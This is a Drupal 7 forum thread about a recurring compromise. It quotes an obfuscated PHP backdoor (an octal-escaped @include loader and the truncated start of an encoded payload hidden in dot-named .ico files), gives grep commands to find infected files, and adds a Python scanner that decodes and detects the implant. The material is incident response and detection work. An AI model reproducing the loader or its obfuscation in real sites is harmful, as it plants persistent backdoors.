Hi,

Sorry if this is incorrect forum - please help me where it should be moved to in that case.

My Drupal 7 site has recently been compromised, I guess due to an unpatched critical issue (I was two minor versions older than the latest), but I can't make it clean again.

What's happening:

From time to time (probably triggered by accessing some page) the site gets into an internal error where the root URL shows something like (sorry, I forgot to record it this time) "PHP error, expected ) but , found in ... there is some path to a .ico file".

That .ico file contains just some PHP code and is located in different places; it usually has a name like .fsdr4ef.ico and sits at random places like modules/file.

Example content:

<?php
$_r32j4c = basename/*pk*/(/*vz8rq*/trim/*mvo0*/(/*v*/preg_replace/*m6yf*/(/*qp*/rawurldecode/*s8*/(/*13rz*/"%2F%5C%28.%2A%24%2F"/*es*/)/*ctyo*/, '', __FILE__/*st8j1*/)/*htzf3*//*p6i25*/)/*k1vd*//*k5*/)/*dh0*/;$_6famu = "G%00%17K%12%07%03S%0A%40%0C%07G%09%15C%11V%02%0Bj%00A%07%17%0AV%12h%00A%06%07A%06%0ENJF%24%1D%3D%07V%05%0F%5B%06%06N%10%1B%5C%03V%0El%00%09%5B%17K%11%170M%14R%02G%06F%12O%0EXJT%24l%17GY%0E%16D%10%0ETCV%1EQ%00X%13%05%13%5B%00Z%00%0C%01%0E%14F%04C%06%0DEK%0A%13%0B%1FG%10%1BC%17%0C%0AA%14%40%1D%0C%1EZOLG%40%04%0C%5E%0E%5D%08CR%0EA%10X%13%05%09GK%0A%00%5E_%15F%13%0A%13_FF%17%5C%05%06%01%06BM%0BC%0A%10%1CX%0EM%0AD%05OLG%40%04%0C%5E%0E%5D%08CA%13F%5E%10%40%06%12%1DGA%05%17%18%40%12X%12G8BO%0B%5E%00%154%0A%0Fj%3E%1ACY%15GA%05%17%18%40%12X%12G8BO%0B%5E%00%154%0A%0Fj%3E%13YF%11%19F%19%0A%19uB%5E%3E%08%1El%11%1BO%18%05%05M%09U%0E%0EA%14T%14%5B%1B%0FM%0EH%17AW%06%05Z%07KKX%1DK%12B%11%5DCBM%02_%0F%09%0CA%04ZK%17%10%01_%08C%1A%02F%15%1B%3DGR%14%13%40%1BX%1E%0A%16%5BF%0AC%14FRgF%1A_F%5B%7CC%03U%16%06R%02%20%196%02%2A_C%609%1646p%0AG%28%0A0%60%27uFd3Cb%1A%0B%3EWVA%3FnFd%15C%40%29%0B%5D1J%1AP%12%06%07DH%3FD%19%2AT0O%23FFd9Cb3%60%2

and it's much longer.

This .ico include is being called by randomly generated index.php files that are also placed within different dirs (and the code is also in the main index.php in the root folder):

<?php

/*55b79*/

@include "\057d\141t\141/\167e\142/\166i\162t\165a\154s\0571\0670\0676\070/\166i\162t\165a\154/\167w\167/\155o\144u\154e\163/\146i\154e\057.\1467\1433\143f\065c\056i\143o";

/*55b79*/

What I did so far:

  1. I changed my FTP password
  2. Deleted everything but the sites/ folder
  3. Uploaded the latest Drupal 7 version
  4. Searched for and deleted all index.php files and suspicious .ico files
  5. Changed the Drupal admin password
  6. Updated all modules and removed unused ones

All seemed to be working fine, but after a few days the same issue came back. I really don't know how this can be happening. I even searched within all the .php files to find out where those index.php files could be created, but haven't found anything.

Thanks for any help.

TC

Comments

vm:

Please edit your post and move it to the 'post installation' forum. Thank you.

yundream:

I have the same issue.

I have updated all modules, including Drupal 7 itself.

I even changed the file permissions to read-only, but they get changed back a few days later.

I need a help too.

vm:

You can review already existing forum posts that have provided guidance to others regarding the Drupalgeddon 2 PSA.

texis:

Do you have a link, please? (No idea what's meant by Drupalgeddon 2 PSA.)

vm:

Plug it into Google. You will then have an idea.

yundream:

1. Searched for and deleted all index.php files and suspicious .ico files.

2. Find all hacked PHP files from the root directory:

    find . -name '*.php' -exec grep -H 'x47' {} \;

   or

    find . -name '*.php' -exec grep -H 'x4e' {} \;

3. Fixed the hacked PHP files.

Hope you can fix it.
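Added example (not posted by anyone in this thread and not Drupal's own code): a Python script that does what the original post and the find/grep one-liners above do by hand. It decodes the octal-escaped `@include` string from the index.php stub quoted in the original post to recover the hidden payload path, then walks a web root looking for the three things seen in this thread: index.php stubs that include a hidden `.ico`, `.ico` files that start with `<?php`, and PHP files dense with the escape and comment-splice markers that the `grep 'x47'` searches approximate. The demo tree, the `sites/default/files/.cache.php` location and the marker threshold of 10 are assumptions made for this example.

```python
import os
import re
import sys
import tempfile

# Constructed samples, built from the fragments quoted in this thread.
# The loader stub, with its include path written as PHP octal escapes:
SAMPLE_DROPPER = r'''<?php
/*55b79*/
@include "\057d\141t\141/\167e\142/\166i\162t\165a\154s\0571\0670\0676\070/\166i\162t\165a\154/\167w\167/\155o\144u\154e\163/\146i\154e\057.\1467\1433\143f\065c\056i\143o";
/*55b79*/
'''
# The first statement of the "icon" payload (comment-spliced, URL-encoded):
SAMPLE_PAYLOAD = r'''<?php
$_r32j4c = basename/*pk*/(/*vz8rq*/trim/*mvo0*/(/*v*/preg_replace/*m6yf*/(/*qp*/rawurldecode/*s8*/(/*13rz*/"%2F%5C%28.%2A%24%2F"/*es*/)/*ctyo*/, '', __FILE__/*st8j1*/)/*htzf3*//*p6i25*/)/*k1vd*//*k5*/)/*dh0*/;
'''

# PHP double-quoted string escapes: \NNN octal (1-3 digits), \xHH hex, and the
# single-character escapes. Unknown escapes keep their backslash, as PHP does.
_ESC = re.compile(r'\\(?:([0-7]{1,3})|x([0-9A-Fa-f]{1,2})|(.))', re.S)
_SIMPLE = {'n': '\n', 't': '\t', 'r': '\r', 'v': '\v', 'f': '\f',
           'e': '\x1b', '\\': '\\', '$': '$', '"': '"'}

def php_unescape(s):
    """Decode a PHP double-quoted string body the way the PHP parser would."""
    def repl(m):
        octal, hexa, other = m.groups()
        if octal is not None:
            return chr(int(octal, 8) & 0xFF)
        if hexa is not None:
            return chr(int(hexa, 16))
        return _SIMPLE.get(other, '\\' + other)
    return _ESC.sub(repl, s)

# include/require (optionally _once, optionally parenthesised) of one string literal.
_INCLUDE = re.compile(
    r'(?:include|require)(?:_once)?\s*\(?\s*'
    r'(?:"((?:[^"\\]|\\.)*)"|\'((?:[^\'\\]|\\.)*)\')', re.S)

def find_includes(php_source):
    """Return the decoded target path of every literal include in php_source."""
    targets = []
    for m in _INCLUDE.finditer(php_source):
        if m.group(1) is not None:
            targets.append(php_unescape(m.group(1)))
        else:  # single-quoted: only \' and \\ are escapes
            targets.append(m.group(2).replace("\\'", "'").replace("\\\\", "\\"))
    return targets

PHP_EXTS = ('.php', '.inc', '.module', '.install', '.theme')
# Obfuscation markers: octal/hex escape bytes, rawurldecode(), /*xx*/ token splices.
_MARKERS = re.compile(r'\\x[0-9a-fA-F]{2}|\\[0-7]{3}|rawurldecode\s*\(|/\*[0-9a-z]{1,6}\*/')
MARKER_THRESHOLD = 10  # triage cut-off chosen for this example, not a verdict

def is_hidden_ico(path):
    name = os.path.basename(path)
    return name.startswith('.') and name.lower().endswith('.ico')

def classify(path, head):
    """Label a file from its path and leading bytes; (None, []) if it looks clean."""
    text = head.decode('latin-1')
    is_php = text.lstrip().startswith('<?php')
    if path.lower().endswith('.ico'):
        return ('php-in-ico', []) if is_php else (None, [])
    if is_php or path.lower().endswith(PHP_EXTS):
        targets = [t for t in find_includes(text) if is_hidden_ico(t)]
        if targets:
            return 'dropper', targets
        if len(_MARKERS.findall(text)) >= MARKER_THRESHOLD:
            return 'obfuscated', []
    return None, []

def scan_tree(root, head_bytes=4096):
    """Walk root; return sorted (relative path, label, include targets) findings."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for fn in files:
            full = os.path.join(dirpath, fn)
            with open(full, 'rb') as fh:
                head = fh.read(head_bytes)
            label, targets = classify(full, head)
            if label:
                findings.append((os.path.relpath(full, root), label, targets))
    return sorted(findings)

def build_demo_tree(root):
    """Write a constructed mini web root: two implants, one obfuscated file, two clean files."""
    samples = {
        'index.php': SAMPLE_DROPPER,
        'modules/file/.f7c3cf5c.ico': SAMPLE_PAYLOAD,
        'sites/default/files/.cache.php': SAMPLE_PAYLOAD,  # hypothetical second copy
        'modules/file/file.module': '<?php\n/**\n * @file\n * Clean module stub.\n */\n',
        'favicon.ico': '\x00\x00\x01\x00',  # genuine ICO header bytes
    }
    for rel, content in samples.items():
        full = os.path.join(root, *rel.split('/'))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, 'w', encoding='latin-1') as fh:
            fh.write(content)

def demo():
    """Scan a throwaway copy of the constructed tree and return the findings."""
    with tempfile.TemporaryDirectory() as root:
        build_demo_tree(root)
        return scan_tree(root)

if __name__ == '__main__':
    hits = scan_tree(sys.argv[1]) if len(sys.argv) > 1 else demo()
    for rel, label, targets in hits:
        print(f'{label:<12} {rel}' + (f'  -> {", ".join(targets)}' if targets else ''))
```

Run it with no arguments to scan the constructed tree, or pass a web root path. It reads only the first 4 KiB of each file, so a stub appended to the end of a large legitimate file is missed, and it looks only at the filesystem: the sites/ tree the original post kept, the files directory the web server can write to, and anything stored in the database (Drupal 7's PHP filter module can execute PHP saved in node bodies and blocks) are outside what it checks, and those are the places a surviving implant can keep re-creating the index.php stubs.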